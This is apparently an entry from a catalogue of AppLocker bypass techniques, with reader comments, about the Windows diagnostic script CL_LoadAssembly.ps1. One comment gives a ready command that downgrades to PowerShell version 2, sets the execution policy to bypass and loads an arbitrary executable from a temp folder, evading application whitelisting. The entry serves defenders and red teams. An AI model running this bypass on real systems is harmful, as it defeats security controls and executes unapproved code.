Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes
Bypasses Constrained Language mode by invoking PowerShell version 2
Notes: Requires PowerShell version 2
I removed the CL_Invocation since it relies on PowerShell v2. So the bypass is actually PowerShell version 2 and it is listed in the generic bypasses. Thanks for pointing it out.
You might want to add this:
powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ........\temp\funrun.exe
Requires admin: No Windows binary: Yes Bypasses AppLocker Default rules: Yes Bypasses Constrained Language mode by invoking PowerShell version 2 Notes: Requires PowerShell version 2
Links: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/